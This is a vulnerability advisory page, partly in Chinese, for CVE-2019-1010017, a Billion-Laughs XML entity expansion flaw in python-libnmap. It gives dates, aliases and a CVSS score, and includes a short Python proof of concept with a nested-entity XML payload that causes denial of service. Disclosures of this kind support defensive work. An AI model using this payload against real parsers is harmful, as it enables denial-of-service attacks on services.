CVE-2019-1010017

HIGH7.5EPSS 0.56%

XML Injection in python-libnmap

發布日:2019/7/18修改日:2024/10/15
也稱為:GHSA-9ccv-p7fg-m73xDEBIAN-CVE-2019-1010017PYSEC-2019-218

描述

### Description python-libnmap is affected by a Billion-Laughs -style XML injection vulnerability. ### PoC ```python ty = NmapParser() payload = """ <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> ]> <lolz><hello>&lol3;</hello></lolz> """ ty.parse(payload) ```

受影響套件(3)

CVSS 分數

來源版本嚴重程度向量
osvCVSS 3.1HIGH7.5CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

參考連結(7)